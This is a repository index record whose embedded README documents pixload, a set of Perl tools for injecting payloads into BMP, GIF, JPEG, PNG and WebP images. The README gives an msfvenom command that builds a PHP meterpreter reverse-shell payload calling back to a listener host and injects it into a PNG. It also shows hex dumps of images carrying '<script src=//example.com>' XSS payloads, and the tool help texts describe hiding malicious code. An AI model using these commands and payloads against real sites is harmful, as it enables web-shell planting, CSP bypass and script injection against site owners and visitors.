{"id":13845056,"url":"https://github.com/sighook/pixload","last_synced_at":"2025-05-16T10:06:33.914Z","repository":{"id":41471309,"uuid":"208521934","full_name":"sighook/pixload","owner":"sighook","description":"Image Payload Creating/Injecting tools","archived":false,"fork":false,"pushed_at":"2023-11-30T05:14:13.000Z","size":118,"stargazers_count":1202,"open_issues_count":8,"forks_count":238,"subscribers_count":52,"default_branch":"master","last_synced_at":"2024-10-29T16:58:20.190Z","etag":null,"topics":["backdoor-attacks","hacking-tool","image","image-processing","injection","injector","payload-generator","payloads","web-attack-payloads"],"latest_commit_sha":null,"homepage":"","language":"Perl","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"wtfpl","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sighook.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-09-15T00:41:32.000Z","updated_at":"2024-10-27T17:23:04.000Z","dependencies_parsed_at":"2024-03-08T09:01:27.586Z","dependency_job_id":null,"html_url":"https://github.com/sighook/pixload","commit_stats":null,"previous_names":["chinarulezzz/pixload"],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sighook%2Fpixload","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sighook%2Fpixload/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sighook%2Fpixload/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sighook%2Fpixload/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sighook","download_url":"https://codeload.github.com/sighook/pixload/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254509476,"owners_count":22082891,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor-attacks","hacking-tool","image","image-processing","injection","injector","payload-generator","payloads","web-attack-payloads"],"created_at":"2024-08-04T17:03:09.210Z","updated_at":"2025-05-16T10:06:33.896Z","avatar_url":"https://github.com/sighook.png","language":"Perl","funding_links":[],"categories":["Perl"],"sub_categories":[],"readme":"# pixload -- Image Payload Creating tools\n\n## DESCRIPTION\n\nSet of tools for ~~hiding backdoors~~ creating/injecting payload into images.\n\nThe following image types are currently supported: BMP, GIF, JPG, PNG, WebP.\n\n#### about\n\nUseful references for better understanding of `pixload` and its use-cases:\n\n- [Bypassing CSP using polyglot JPEGs](https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs)\n\n- [Hacking group using Polyglot images to hide malvertising attacks](https://web.archive.org/web/20190226193728/https://devcondetect.com/blog/2019/2/24/hacking-group-using-polyglot-images-to-hide-malvertsing-attacks)\n\n- [Encoding Web Shells in PNG IDAT chunks](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)\n\n- [An XSS on Facebook via PNGs \u0026 Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)\n\n- [Revisiting XSS payloads in PNG IDAT chunks](https://www.adamlogue.com/revisiting-xss-payloads-in-png-idat-chunks/)\n\nIf you want to encode a payload in such a way that the resulting binary blob is\nboth valid x86 shellcode and a valid image file, I recommend you to look\n[here](https://web.archive.org/web/20201008001325/https://warroom.securestate.com/bmp-x86-polyglot/)\nand\n[here](https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/bmp_polyglot.rb).\n\n#### msfvenom\n\nIf you want to inject a metasploit payload, you have to do something like this:\n\n1. Create metasploit payload (i.e. php).\n```sh\n$ msfvenom -p php/meterpreter_reverse_tcp \\\n\tLHOST=192.168.0.1 LPORT=31337 -f raw 2\u003e/dev/null \u003e payload.php\n```\n\n2. Edit `payload.php` if needed.\n\n3. Inject `payload.php` into the image (i.e. png).\n```sh\n$ pixload-png --payload \"$(cat payload.php)\" payload.png\n```\n\n## SETUP\n\n##### Dependencies\n\nThe following Perl modules are required:\n\n  * GD\n\n  * Image::ExifTool\n\n  * String::CRC32\n\nOn `Debian-based` systems install these packages:\n\n```sh\nsudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl\n```\n\nOn `FreeBSD` and `DragonFlyBSD` install these packages:\n```sh\ndoas pkg install p5-GD p5-Image-ExifTool p5-String-CRC32\n```\n\nOn `OSX` please refer to [this workaround](https://github.com/sighook/pixload/issues/3)\n(thnx 2 @iosdec).\n\n##### Build and Install\n\n```sh\nmake install\n```\n\n#### Docker\n\n```sh\ndocker build -t pixload .\ndocker run -v \"$(pwd):/pixload\" -it --rm pixload\n```\n\n## TOOLS\n\n### pixload-bmp\n\n##### Help\n\n```sh\n$ pixload-bmp --help\n```\n\n```\nUsage: pixload-bmp [OPTION]... FILE\nHide Payload/Malicious Code in BMP Images.\n\nMandatory arguments to long options are mandatory for short options too.\n  -P, --payload STRING   set payload for injection\n  -v, --version          print version and exit\n  -h, --help             print help and exit\n\nIf the output FILE already exists, then payload will be injected into this\nexisting file. Otherwise, the new one will be created.\n```\n\n##### Example\n\n```sh\n$ pixload-bmp payload.bmp\n```\n\n```\n...... BMP Payload Creator/Injector ......\n..........................................\n... https://github.com/sighook/pixload ...\n..........................................\n\n[\u003e] Generating output file\n[✔] File saved to: payload.bmp\n\n[\u003e] Injecting payload into payload.bmp\n[✔] Payload was injected successfully\n\npayload.bmp: PC bitmap, OS/2 1.x format, 1 x 1 x 24, cbSize 10799, bits offset 26\n\n00000000  42 4d 2f 2a 00 00 00 00  00 00 1a 00 00 00 0c 00  |BM/*............|\n00000010  00 00 01 00 01 00 01 00  18 00 00 00 ff 00 2a 2f  |..............*/|\n00000020  3d 31 3b 3c 73 63 72 69  70 74 20 73 72 63 3d 2f  |=1;\u003cscript src=/|\n00000030  2f 65 78 61 6d 70 6c 65  2e 63 6f 6d 3e 3c 2f 73  |/example.com\u003e\u003c/s|\n00000040  63 72 69 70 74 3e 3b                              |cript\u003e;|\n00000047\n```\n\nSee [pixload-bmp(1)](https://github.com/sighook/pixload/blob/master/pixload-bmp.1.pod)\nmanual page for more information.\n\n### pixload-gif\n\n##### Help\n\n```sh\n$ pixload-gif --help\n```\n\n```\nUsage: pixload-gif [OPTION]... FILE\nHide payload/malicious code in GIF images.\n\nMandatory arguments to long options are mandatory for short options too.\n  -W, --pixelwidth  INTEGER   (has no effect)\n                              set pixel width for the new image (default: 10799)\n  -H, --pixelheight INTEGER   set pixel height for the new image (default: 32)\n  -P, --payload     STRING    set payload for injection\n  -v, --version               print version and exit\n  -h, --help                  print help and exit\n\nThe option -W, --pixelwidth has no effect since pixload-gif rewrites\npixel width bytes with \"/*\" characters, to prepare the polyglot gif image.\n\nIf the output FILE already exists, then the payload will be injected into this\nexisting file. Otherwise, the new one will be created with specified pixels\nwide.\n```\n\n##### Example\n\n```sh\n$ pixload-gif payload.gif\n```\n\n```\n...... GIF Payload Creator/Injector ......\n..........................................\n... https://github.com/sighook/pixload ...\n..........................................\n\n[\u003e] Generating output file\n[✔] File saved to: payload.gif\n\n[\u003e] Injecting payload into payload.gif\n[✔] Payload was injected successfully\n\npayload.gif: GIF image data, version 87a, 10799 x 32\n\n00000000  47 49 46 38 37 61 2f 2a  20 00 80 00 00 04 02 04  |GIF87a/* .......|\n00000010  00 00 00 2c 00 00 00 00  20 00 20 00 00 02 1e 84  |...,.... . .....|\n00000020  8f a9 cb ed 0f a3 9c b4  da 8b b3 de bc fb 0f 86  |................|\n00000030  e2 48 96 e6 89 a6 ea ca  b6 ee 0b 9b 05 00 3b 2a  |.H............;*|\n00000040  2f 3d 31 3b 3c 73 63 72  69 70 74 20 73 72 63 3d  |/=1;\u003cscript src=|\n00000050  2f 2f 65 78 61 6d 70 6c  65 2e 63 6f 6d 3e 3c 2f  |//example.com\u003e\u003c/|\n00000060  73 63 72 69 70 74 3e 3b                           |script\u003e;|\n00000068\n```\nSee [pixload-gif(1)](https://github.com/sighook/pixload/blob/master/pixload-gif.1.pod)\nmanual page for more information.\n\n### pixload-jpg\n\n##### Help\n\n```sh\n$ pixload-jpg --help\n```\n\n```\nUsage: pixload-jpg [OPTION]... FILE\nHide Payload/Malicious Code in JPEG images.\n\nMandatory arguments to long options are mandatory for short options too.\n  -S, --section COM|DQT         set section for payload injection\n  -P, --payload STRING          set payload for injection\n  -v, --version                 print version and exit\n  -h, --help                    print help and exit\n\nIf the output FILE already exists, then payload will be injected into this\nexisting file. Otherwise, the new one will be created.\n```\n\n##### Examples\n\n1. Inject payload into comment section:\n\n```sh\n$ pixload-jpg -S com payload.jpg\n```\n\n```\n..... JPEG Payload Creator/Injector ......\n..........................................\n... https://github.com/sighook/pixload ...\n..........................................\n\n[\u003e] Generating output file\n[✔] File saved to: payload.jpg\n\n[\u003e] Injecting payload into COMMENT\n[✔] Payload was injected successfully\n\npayload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1\n\n00000000  ff d8 ff fe 00 25 3c 73  63 72 69 70 74 20 73 72  |.....%\u003cscript sr|\n00000010  63 3d 2f 2f 65 78 61 6d  70 6c 65 2e 63 6f 6d 3e  |c=//example.com\u003e|\n00000020  3c 2f 73 63 72 69 70 74  3e ff db 00 43 00 01 01  |\u003c/script\u003e...C...|\n00000030  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................|\n*\n00000060  01 01 01 01 01 01 01 01  01 01 01 01 01 01 ff c2  |................|\n00000070  00 0b 08 00 01 00 01 01  01 11 00 ff c4 00 14 00  |................|\n00000080  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n00000090  03 ff da 00 08 01 01 00  00 00 01 3f ff d9        |...........?..|\n0000009e\n```\n\n2. Inject payload into DQT table:\n\n```sh\n$ pixload-jpg -S dqt payload.jpg\n```\n\n```\n..... JPEG Payload Creator/Injector ......\n..........................................\n... https://github.com/sighook/pixload ...\n..........................................\n\n[\u003e] Generating output file\n[✔] File saved to: payload.jpg\n\n[\u003e] Injecting payload into DQT table\n[✔] Payload was injected succesfully\n\npayload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1\n\n00000000  ff d8 ff db 00 43 00 01  01 01 01 01 01 01 01 01  |.....C..........|\n00000010  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................|\n00000020  01 01 01 01 3c 73 63 72  69 70 74 20 73 72 63 3d  |....\u003cscript src=|\n00000030  2f 2f 65 78 61 6d 70 6c  65 2e 63 6f 6d 3e 3c 2f  |//example.com\u003e\u003c/|\n00000040  73 63 72 69 70 74 3e ff  c2 00 0b 08 00 01 00 01  |script\u003e.........|\n00000050  01 01 11 00 ff c4 00 14  00 01 00 00 00 00 00 00  |................|\n00000060  00 00 00 00 00 00 00 00  00 03 ff da 00 08 01 01  |................|\n00000070  00 00 00 01 3f ff d9 01  01 11 00 ff c4 00 14 00  |....?...........|\n00000080  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n00000090  03 ff da 00 08 01 01 00  00 00 01 3f ff d9        |...........?..|\n0000009e\n```\n\nSee [pixload-jpg(1)](https://github.com/sighook/pixload/blob/master/pixload-jpg.1.pod)\nfor more information.\n\n### pixload-png\n\n##### Help\n\n```sh\n$ pixload-png --help\n```\n\n```\nUsage: pixload-png [OPTION]... FILE\nHide Payload/Malicious Code in PNG Images.\n\nMandatory arguments to long options are mandatory for short options too.\n  -W, --pixelwidth  INTEGER   set pixel width for the new image (default: 32)\n  -H, --pixelheight INTEGER   set pixel height for the new image (default: 32)\n  -P, --payload STRING        set payload for injection\n  -v, --version               print version and exit\n  -h, --help                  print help and exit\n\nIf the output FILE already exists, then payload will be injected into this\nexisting file. Else, the new one will be created with specified pixels wide.\n```\n\n##### Example\n\n```sh\n$ pixload-png payload.png\n```\n\n```\n...... PNG Payload Creator/Injector ......\n..........................................\n... https://github.com/sighook/pixload ...\n..........................................\n\n[\u003e] Generating output file\n[✔] File saved to: payload.png\n\n[\u003e] Injecting payload into payload.png\n\n[+] Chunk size: 13\n[+] Chunk type: IHDR\n[+] CRC: fc18eda3\n[+] Chunk size: 9\n[+] Chunk type: pHYs\n[+] CRC: 952b0e1b\n[+] Chunk size: 25\n[+] Chunk type: IDAT\n[+] CRC: c8a288fe\n[+] Chunk size: 0\n[+] Chunk type: IEND\n\n[\u003e] Inject payload to the new chunk: 'pUnk'\n[✔] Payload was injected successfully\n\npayload.png: PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced\n\n00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|\n00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|\n00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e  |.....pHYs.......|\n00000030  c4 01 95 2b 0e 1b 00 00  00 19 49 44 41 54 48 89  |...+......IDATH.|\n00000040  ed c1 31 01 00 00 00 c2  a0 f5 4f ed 61 0d a0 00  |..1.......O.a...|\n00000050  00 00 6e 0c 20 00 01 c8  a2 88 fe 00 00 00 00 49  |..n. ..........I|\n00000060  45 4e 44 ae 42 60 82 00  00 00 00 00 00 00 00 00  |END.B`..........|\n00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n*\n000000c0  00 23 50 55 6e 4b 3c 73  63 72 69 70 74 20 73 72  |.#PUnK\u003cscript sr|\n000000d0  63 3d 2f 2f 65 78 61 6d  70 6c 65 2e 63 6f 6d 3e  |c=//example.com\u003e|\n000000e0  3c 2f 73 63 72 69 70 74  3e eb fd 2e 9f 00 49 45  |\u003c/script\u003e.....IE|\n000000f0  4e 44                                             |ND|\n000000f2\n```\n\nSee [pixload-png(1)](https://github.com/sighook/pixload/blob/master/pixload-png.1.pod)\nmanual page for more information.\n\n### pixload-webp\n\n##### Help\n\n```sh\n$ pixload-webp --help\n```\n\n```\nUsage: pixload-webp [OPTION]... FILE\nHide payloads/malicious code in WebP images.\n\nMandatory arguments to long options are mandatory for short options too.\n  -P, --payload STRING   set payload for injection\n  -v, --version          print version and exit\n  -h, --help             print help and exit\n\nCurrently, there is no possibility to inject the payload into an existing\nWebP image. Only the new (minimal) WebP image will be created and your\npayload will be injected into. If the output FILE already exists, the\npayload will be injected into the existing image, but this image will be\ncorrupted.\n```\n\n##### Example\n\n```sh\n$ pixload-webp payload.webp\n```\n\n```\n..... WebP Payload Creator/Injector ......\n..........................................\n... https://github.com/sighook/pixload ...\n..........................................\n\n[\u003e] Generating output file\n[✔] File saved to: payload.webp\n\n[\u003e] Injecting payload into payload.webp\n[✔] Payload was injected successfully\n\npayload.webp: RIFF (little-endian) data, Web/P image\n\n00000000  52 49 46 46 2f 2a 00 00  57 45 42 50 56 50 38 4c  |RIFF/*..WEBPVP8L|\n00000010  ff ff ff 00 2f 00 00 00  10 07 10 11 11 88 88 fe  |..../...........|\n00000020  07 00 2a 2f 3d 31 3b 3c  73 63 72 69 70 74 20 73  |..*/=1;\u003cscript s|\n00000030  72 63 3d 2f 2f 65 78 61  6d 70 6c 65 2e 63 6f 6d  |rc=//example.com|\n00000040  3e 3c 2f 73 63 72 69 70  74 3e 3b                 |\u003e\u003c/script\u003e;|\n0000004b\n```\n\nSee [pixload-webp(1)](https://github.com/sighook/pixload/blob/master/pixload-webp.1.pod)\nmanual page for more information.\n\n## LICENSE\n\nWTFPL version 2.\nSee [LICENSE](https://github.com/sighook/pixload/blob/master/LICENSE)\nfor more information.\n\n## LEGAL DISCLAIMER\n\nThe author does not hold any responsibility for the bad use\nof this tool, remember that attacking targets without prior\nconsent is illegal and punished by law.\n\n## DONATIONS\n\n- BTC: `bc1qj4g98svq6qh3q2ap37v52nsvusa76c3cnmcdmx`\n\n- PAYPAL: `alexandr.savca89@gmail.com`\n\nHighly appreciated.\n\n\n\u003c!-- vim:sw=2:ts=2:sts=2:et:cc=80\nEnd of file. --\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsighook%2Fpixload","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsighook%2Fpixload","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsighook%2Fpixload/lists"}